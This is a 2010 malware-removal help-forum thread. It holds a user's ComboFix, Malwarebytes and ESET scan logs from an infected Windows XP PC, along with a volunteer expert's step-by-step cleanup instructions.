ComboFix 10-09-22.02 - HP_Owner 23/09/2010 22:37:27.3.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3071.2498 [GMT 1:00]
Running from: c:\documents and settings\HP_Owner\Desktop\ComboFix.exe
Command switches used :: c:\documents and settings\HP_Owner\Desktop\CFScript2.txt
AV: McAfee Anti-Virus and Anti-Spyware *On-access scanning disabled* (Updated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Firewall *disabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\HP_Owner\Application Data\Foxix
c:\documents and settings\HP_Owner\Application Data\Huasq
c:\documents and settings\HP_Owner\Application Data\Udfyr
c:\documents and settings\HP_Owner\Application Data\Yfwy
c:\documents and settings\HP_Owner\Application Data\Yfwy\dehye.tmp

.
--------------- FCopy ---------------

c:\windows\ServicePackFiles\i386\termsrv.dll --> c:\windows\system32\termsrv.dll
.
((((((((((((((((((((((((( Files Created from 2010-08-23 to 2010-09-23 )))))))))))))))))))))))))))))))
.

2010-09-23 01:38 . 2010-09-23 02:14 -------- d-----w- c:\program files\eMusic Download Manager
2010-09-22 23:09 . 2010-06-14 14:31 744448 -c----w- c:\windows\system32\dllcache\helpsvc.exe
2010-09-22 01:26 . 2010-09-23 20:58 -------- d-----w- C:\_malware logs
2010-09-21 18:04 . 2010-09-21 18:04 -------- d-----w- C:\rsit
2010-09-20 22:43 . 2010-09-21 01:35 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-09-20 22:43 . 2010-09-20 22:49 -------- d-----w- c:\program files\Spybot - Search & Destroy
2010-09-20 21:51 . 2010-09-22 22:12 -------- d-----w- c:\windows\system32\MpEngineStore
2010-09-20 16:23 . 2010-09-21 18:06 -------- d-----w- c:\program files\Trend Micro
2010-09-14 01:33 . 2010-09-14 07:47 -------- d-----w- C:\ccleaner
2010-09-13 22:26 . 2010-09-13 22:26 -------- d-----w- c:\documents and settings\Administrator\Application Data\Malwarebytes
2010-09-13 18:24 . 2010-09-13 18:24 -------- d-----w- c:\windows\Options
2010-09-13 01:44 . 2010-09-13 01:44 10134 ----a-r- c:\documents and settings\HP_Owner\Application Data\Microsoft\Installer\{4CCC7F68-A437-4559-A840-F5E010934951}\ARPPRODUCTICON.exe
2010-09-12 20:39 . 2010-09-12 20:39 310208 ----a-w- c:\documents and settings\HP_Owner\Application Data\Azureus\plugins\mlab\ShaperProbeC.exe
2010-09-12 20:35 . 2010-09-12 20:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Motive
2010-08-27 21:21 . 2006-08-24 05:44 477696 ----a-r- c:\windows\system32\drivers\ZD1211BU.sys

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-09-23 21:08 . 2007-09-26 22:27 -------- d-----w- c:\program files\Microsoft Silverlight
2010-09-23 21:06 . 2010-05-02 14:57 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\TeraCopy
2010-09-23 02:14 . 2008-11-28 18:35 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\eMusic
2010-09-22 22:13 . 2006-01-20 08:30 5504 ----a-w- c:\windows\system32\drivers\intelide.sys
2010-09-22 20:09 . 2007-09-29 20:11 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\Azureus
2010-09-19 20:13 . 2009-07-23 18:08 -------- d-----w- c:\documents and settings\HP_Owner\Application Data\vlc
2010-09-13 18:24 . 2008-09-18 20:59 -------- d-----w- c:\program files\iTunes
2010-09-13 15:15 . 2006-01-20 04:18 -------- d-----w- c:\program files\UTILS
2010-09-12 22:32 . 2010-09-12 22:32 396 ----a-w- c:\program files\.js
2010-08-24 13:57 . 2010-04-15 21:10 9344 ----a-w- c:\windows\system32\drivers\mfeclnk.sys
2010-08-24 13:57 . 2010-04-15 21:09 95600 ----a-w- c:\windows\system32\drivers\mfeapfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 88544 ----a-w- c:\windows\system32\drivers\mfendisk.sys
2010-08-24 13:57 . 2010-04-15 21:09 84264 ----a-w- c:\windows\system32\drivers\mferkdet.sys
2010-08-24 13:57 . 2010-04-15 21:09 84072 ----a-w- c:\windows\system32\drivers\mfetdi2k.sys
2010-08-24 13:57 . 2010-04-15 21:09 52104 ----a-w- c:\windows\system32\drivers\mfebopk.sys
2010-08-24 13:57 . 2010-04-15 21:09 386712 ----a-w- c:\windows\system32\drivers\mfehidk.sys
2010-08-24 13:57 . 2010-04-15 21:09 312904 ----a-w- c:\windows\system32\drivers\mfefirek.sys
2010-08-24 13:57 . 2010-04-15 21:09 152992 ----a-w- c:\windows\system32\drivers\mfeavfk.sys
2010-08-24 13:57 . 2010-04-15 21:09 55840 ----a-w- c:\windows\system32\drivers\cfwids.sys
2010-08-17 13:17 . 2006-01-20 08:32 58880 ----a-w- c:\windows\system32\spoolsv.exe
2010-07-22 15:49 . 2006-01-20 08:32 590848 ----a-w- c:\windows\system32\rpcrt4.dll
2010-07-22 05:57 . 2009-04-15 19:31 5120 ----a-w- c:\windows\system32\xpsp4res.dll
2010-06-30 12:31 . 2006-01-20 08:32 149504 ----a-w- c:\windows\system32\schannel.dll
2010-08-24 13:57 . 2010-04-15 21:10 24376 ----a-w- c:\program files\mozilla firefox\components\Scriptff.dll
2005-01-03 22:30 . 2006-01-20 08:54 0 --sha-w- c:\windows\SMINST\HPCD.SYS
.

((((((((((((((((((((((((((((( SnapShot@2010-09-23_20.52.12 )))))))))))))))))))))))))))))))))))))))))
.
+ 2010-09-23 21:00 . 2010-09-23 21:00 16384 c:\windows\Temp\Perflib_Perfdata_650.dat
+ 2010-06-15 00:54 . 2010-09-23 21:10 49152 c:\windows\Installer\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}\ConfigIcon.dll
- 2010-06-15 00:54 . 2010-06-15 00:54 49152 c:\windows\Installer\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}\ConfigIcon.dll
+ 2010-09-23 21:08 . 2010-09-23 21:08 20303872 c:\windows\Installer\7cb08.msp
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{9DFE2FE9-CF99-4ADF-A28E-9B5ADB8DC74F}]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-07-13 68856]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"hpsysdrv"="c:\windows\system\hpsysdrv.exe" [1998-05-07 52736]
"HPHUPD06"="c:\program files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe" [2004-06-07 49152]
"HPHmon06"="c:\windows\system32\hphmon06.exe" [2004-06-07 659456]
"KBD"="c:\hp\KBD\KBD.EXE" [2003-02-11 61440]
"Recguard"="c:\windows\SMINST\RECGUARD.EXE" [2004-04-14 233472]
"SiS Windows KeyHook"="c:\windows\system32\keyhook.exe" [2004-05-20 249856]
"ATIPTA"="c:\program files\ATI Technologies\ATI Control Panel\atiptaxx.exe" [2004-06-24 339968]
"ATICCC"="c:\program files\ATI Technologies\ATI.ACE\cli.exe" [2005-08-12 45056]
"SoundMan"="SOUNDMAN.EXE" [2004-07-01 73728]
"AlcWzrd"="ALCWZRD.EXE" [2004-07-06 2550272]
"PS2"="c:\windows\system32\ps2.exe" [2002-10-16 81920]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2007-08-31 1037736]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-10-28 141600]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"mcui_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2010-06-30 1193848]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 88363]
"Malwarebytes' Anti-Malware"="c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe" [2010-04-29 437584]

c:\documents and settings\HP_Owner\Start Menu\Programs\Startup\
Adobe Gamma.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2005-3-16 113664]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Acrobat Assistant.lnk - c:\program files\Adobe\Acrobat 6.0\Distillr\acrotray.exe [2003-5-15 217193]
HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2005-5-12 282624]
HP Image Zone Fast Start.lnk - c:\program files\HP\Digital Imaging\bin\hpqthb08.exe [2005-5-12 73728]
Microsoft Office.lnk - c:\program files\Microsoft Office\Office10\OSA.EXE [2001-2-13 83360]
Windows Home Server.lnk - c:\windows\Installer\{21E49794-7C13-4E84-8659-55BD378267D5}\WHSTrayApp.exe [2010-2-20 604008]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"RequireSignedAppInit_DLLs"=1 (0x1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CloneCDTray]
2006-09-28 19:21 57344 ----a-w- c:\program files\SlySoft\CloneCD\CloneCDTray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Home Theater SchSvr]
2004-07-30 10:34 155648 ----a-w- c:\program files\Common Files\InterVideo\SchSvr\SchSvr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\mxomssmenu]
2007-09-06 14:53 169264 ----a-w- c:\program files\Maxtor\OneTouch Status\MaxMenuMgr.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2009-09-05 00:54 417792 ----a-w- c:\program files\QuickTime\QTTask.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2009-11-02 22:52 198160 ----a-w- c:\program files\Common Files\Real\Update_OB\realsched.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Windows Media Connect 2]
2006-10-18 20:58 8704 ------w- c:\program files\Windows Media Connect 2\WMCCFG.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WINREMOTE]
2004-07-30 10:41 192512 ----a-w- c:\program files\InterVideo\Common\Bin\WinRemote.exe

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"c:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\SmartFTP Client 2.0\\SmartFTP.exe"=
"c:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\Program Files\\TVersity\\Media Server\\MediaServer.exe"=
"c:\\Program Files\\Common Files\\McAfee\\McSvcHost\\McSvHost.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3587:TCP"= 3587:TCP:Windows Peer-to-Peer Grouping
"3540:UDP"= 3540:UDP:Peer Name Resolution Protocol (PNRP)
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\IcmpSettings]
"AllowInboundEchoRequest"= 1 (0x1)

R1 mfetdi2k;McAfee Inc. mfetdi2k;c:\windows\system32\drivers\mfetdi2k.sys [15/04/2010 22:09 84072]
R2 HPMSSConnectorSvc;HPMSSConnectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MSSConnectorService.exe [05/10/2009 12:09 20992]
R2 Iprip;RIP Listener;c:\windows\System32\svchost.exe -k netsvcs [20/01/2006 09:32 14336]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [04/05/2010 01:17 304464]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [13/01/2010 23:35 88176]
R2 McMPFSvc;McAfee Personal Firewall Service;"c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 McNaiAnn;McAfee VirusScan Announcer;"c:\program files\Common Files\McAfee\McSvcHost\McSvHost.exe" /McCoreSvc [15/04/2010 22:09 271480]
R2 MediaCollectorService;MediaCollectorService;c:\program files\Hewlett-Packard\HP MediaSmart Server\MediaCollectorClient.exe [05/10/2009 12:09 81920]
R2 mfefire;McAfee Firewall Core Service;c:\program files\Common Files\McAfee\SystemCore\mfefire.exe [15/04/2010 22:10 188136]
R2 mfevtp;McAfee Validation Trust Protection Service;c:\program files\Common Files\McAfee\SystemCore\mfevtps.exe [15/04/2010 22:09 141792]
R2 WHSConnector;Windows Home Server Connector Service;c:\program files\Windows Home Server\WHSConnector.exe [07/10/2009 14:48 376680]
R3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [15/04/2010 22:09 55840]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [04/05/2010 01:17 20952]
R3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [15/04/2010 22:09 312904]
R3 mfendiskmp;mfendiskmp;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
R3 PhTVTune;ASUS WDM TV Tuner;c:\windows\system32\drivers\PhTVTune.sys [02/01/2004 03:19 24608]
S2 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [29/01/2010 03:46 135664]
S3 mfendisk;McAfee Core NDIS Intermediate Filter;c:\windows\system32\drivers\mfendisk.sys [15/04/2010 22:09 88544]
S3 mferkdet;McAfee Inc. mferkdet;c:\windows\system32\drivers\mferkdet.sys [15/04/2010 22:09 84264]
S3 xbreader;MaxDrive XBox Driver (xbreader.sys);c:\windows\system32\drivers\xbreader.sys [03/01/2001 00:53 19677]

--- Other Services/Drivers In Memory ---

*Deregistered* - mfeavfk01

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
p2psvc REG_MULTI_SZ p2psvc p2pimsvc p2pgasvc PNRPSvc
getPlusHelper REG_MULTI_SZ getPlusHelper
.
Contents of the 'Scheduled Tasks' folder

2010-09-23 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2010-09-23 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-01-29 02:46]

2008-09-16 c:\windows\Tasks\Microsoft_Hardware_Launch_IPoint_exe.job
- c:\program files\Microsoft IntelliPoint\ipoint.exe [2007-08-31 19:01]

2010-09-23 c:\windows\Tasks\User_Feed_Synchronization-{BEDA1DC8-9CAF-4902-8B5F-2FB3702C6673}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.facebook.com/
uDefault_Search_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE= ... pf=desktop
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Settings,ProxyOverride = <local>
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: &Download with &DAP - c:\program files\UTILS\DAP\dapextie.htm
IE: Download &all with DAP - c:\program files\UTILS\DAP\dapextie2.htm
IE: Download All by FlashGet - c:\progra~1\UTILS\FlashGet\jc_all.htm
IE: Download using FlashGet - c:\progra~1\UTILS\FlashGet\jc_link.htm
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\UTILS\DAP\dapie.dll
FF - ProfilePath - c:\documents and settings\HP_Owner\Application Data\Mozilla\Firefox\Profiles\6ncxoaj9.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-09-23 22:53
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-372253836-758569873-2018747408-1007\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1204)
c:\windows\system32\Ati2evxx.dll
.
Completion time: 2010-09-23 22:58:29
ComboFix-quarantined-files.txt 2010-09-23 21:58
ComboFix2.txt 2010-09-23 20:57

Pre-Run: 133,635,960,832 bytes free
Post-Run: 133,630,386,176 bytes free

- - End Of File - - A8DF8BB5828BF77742D1C4CBAACE6069


*********** THANKS FOR THE CONTUNUED HELP ****************

************ FROM ALL YOUR WORK LOOKS LIKE THE MACHINE IS BADLY INFECTED, NO???? *************
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby melboy » September 23rd, 2010, 6:18 pm

Hi

The machines looking a lot better - How are things running?

Depending on the outcome of the MBAM & ESET scans we should be nearly done.


Update Java Runtime
You are using an old version of Java. Sun's Java is sometimes updated in order to eliminate the exploitation of vulnerabilities in an existing version. For this reason, it's extremely important that you keep the program up to date, and also remove the older more vulnerable versions from your system. The most current version of Sun Java is: Java Runtime Environment Version 6 Update 21.

  • Go to Sun Java
  • Scroll down to where it says "JDK 6 Update 21 (JDK or JRE)"
  • Click the orange Download JRE button to the right
  • In the Platform box choose Windows.
  • Check the box to Accept License Agreement and click Continue.
  • Click on Windows Offline Installation, click on the link under it which says "jre-6u21-windows-i586.exe" and save the downloaded file to your desktop.
  • Uninstall all old versions of Java via Start > Control Panel > Add/Remove Programs:
    J2SE Runtime Environment 5.0 Update 10
    J2SE Runtime Environment 5.0 Update 11
    J2SE Runtime Environment 5.0 Update 6
    J2SE Runtime Environment 5.0 Update 8
    J2SE Runtime Environment 5.0 Update 9
    Java 2 Runtime Environment, SE v1.4.2_03
    Java(TM) 6 Update 17
    Java(TM) 6 Update 2
    Java(TM) 6 Update 3
    Java(TM) 6 Update 5
    Java(TM) 6 Update 7
    Java(TM) SE Runtime Environment 6 Update 1
  • Install the new version by running the newly-downloaded file with the java icon which will be at your desktop, and follow the on-screen instructions.
  • Reboot your computer



TFC

  • Please download TFC by Old Timer to your desktop,
  • Save any unsaved work. TFC will close all open application windows.
  • Double-click TFC.exe to run the program.
  • Click the Start button in the bottom left of TFC
  • If prompted, click "Yes" to reboot.

Note: Save your work. TFC will automatically close any open programs, let it run uninterrupted. It should not take longer than a couple of minutes , and may only take a few seconds. Only if needed will you be prompted to reboot.



Malwarebytes' Anti-Malware (MBAM)

As you have Malwarebytes' Anti-Malware installed on your computer. Could you please do a scan using these settings:

  • Open Malwarebytes' Anti-Malware
  • Select the Update tab
  • Click Check for Updates
  • After the update have been completed, Select the Scanner tab.
  • Select Perform Quick scan, then click on Scan
  • When done, you will be prompted. Click OK. If Items are found, then click on Show Results
  • Check all items then click on Remove Selected
  • After it has removed the items, Notepad will open. Please post this log in your next reply.

    The log can also be found here:
    1. C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
    2. Or via the Logs tab when the application is started.

Note: MBAM may ask to reboot your computer so it can continue with the removal process, please do so immediately.
Failure to reboot will prevent MBAM from removing all the malware.




ESET Online Scanner

Note: You can use either Internet Explorer or Mozilla FireFox for this scan. You will however need to disable your current installed Anti-Virus, how to do so can be read here.

  • Please go here then click on: Image
    Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.
    All of the below instructions are compatible with either Internet Explorer or Mozilla FireFox.
  • Select the option YES, I accept the Terms of Use then click on: Image
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on: Image
  • The virus signature database... will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed make sure you first copy the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt
  • Copy and paste that log as a reply to this topic.
  • Now click on: Image (Selecting Uninstall application on close if you so wish)
  • Re-enable your anti-virus software.
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 23rd, 2010, 7:34 pm

Computer looking good Dude...

Uninstalled and Re-installed Java.

Ran TFC which cleared down alot of data.

Malware Log As follows...
_________________________________
Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4665

Windows 5.1.2600 Service Pack 3
Internet Explorer 7.0.5730.11

24/09/2010 00:33:39
mbam-log-2010-09-24 (00-33-39).txt

Scan type: Quick scan
Objects scanned: 167906
Time elapsed: 13 minute(s), 21 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Running other scan now....
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 24th, 2010, 3:11 am

EST Online Scanner Results....

(* Apologies I didn't check advanced settings to make sure that Scan for potentially unsafe applications was selected...other options where - Rerunning again now while I'm at work 8).
______________________________________________________
ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# IEXPLORE.EXE=7.00.6000.17080 (vista_gdr.100616-0452)
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2010-09-24 04:07:42
# local_time=2010-09-24 05:07:42 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 192889 192889 0 0
# compatibility_mode=5121 16777173 100 75 336981 14543809 0 0
# compatibility_mode=8192 67108863 100 0 280 280 0 0
# scanned=195411
# found=5
# cleaned=0
# scan_time=15977
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan

00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\Documents and Settings\HP_Owner\cleanmgr.exe.vir a variant of Win32/Kryptik.GVN trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\WINDOWS\system32\termsrv.dll.vir Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1209\A0213023.exe Win32/Spy.Zbot.ZR trojan

00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1214\A0226391.dll Win32/Spy.Ursnif.A virus

00000000000000000000000000000000 I

_________________________________________
Guess we have more work to do to remove these badboys....
ZxcvB123
Regular Member
 
Posts: 16
Joined: September 20th, 2010, 1:06 pm

Re: Help re: Browser Redirects & Raptr Install...

Unread postby ZxcvB123 » September 24th, 2010, 11:36 am

Heres updated log logging for unsafe apps as well....

_______________________________________________

ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# IEXPLORE.EXE=7.00.6000.17080 (vista_gdr.100616-0452)
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2010-09-24 04:07:42
# local_time=2010-09-24 05:07:42 (+0000, GMT Daylight Time)
# country="United Kingdom"
# lang=1033
# osver=5.1.2600 NT Service Pack 3
# compatibility_mode=512 16777215 100 0 192889 192889 0 0
# compatibility_mode=5121 16777173 100 75 336981 14543809 0 0
# compatibility_mode=8192 67108863 100 0 280 280 0 0
# scanned=195411
# found=5
# cleaned=0
# scan_time=15977
C:\Documents and Settings\All Users\Application Data\AOL Downloads\triton_uk\6.1.17.1\setup.exe probably a variant of Win32/Agent.HZHBURL trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\Documents and Settings\HP_Owner\cleanmgr.exe.vir a variant of Win32/Kryptik.GVN trojan 00000000000000000000000000000000 I
C:\Qoobox\Quarantine\C\WINDOWS\system32\termsrv.dll.vir Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1209\A0213023.exe Win32/Spy.Zbot.ZR trojan 00000000000000000000000000000000 I
C:\System Volume Information\_restore{80DC5C79-2A86-4CC1-9CD1-1BF7D6883F58}\RP1214\A0226391.dll Win32/Spy.Ursnif.A virus 00000000000000000000000000000000 I
esets_scanner_update returned -1 esets_gle=53251
# version=7
# IEXPLORE.EXE=7.00.6000.17080 (vista_gdr.100616-0452)
# OnlineScanner.ocx=1.0.0.6211
# api_version=3.0.2
# EOSSerial=ece37a970719ac46951bea47476c6aad
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2010-09-24 07:18:19
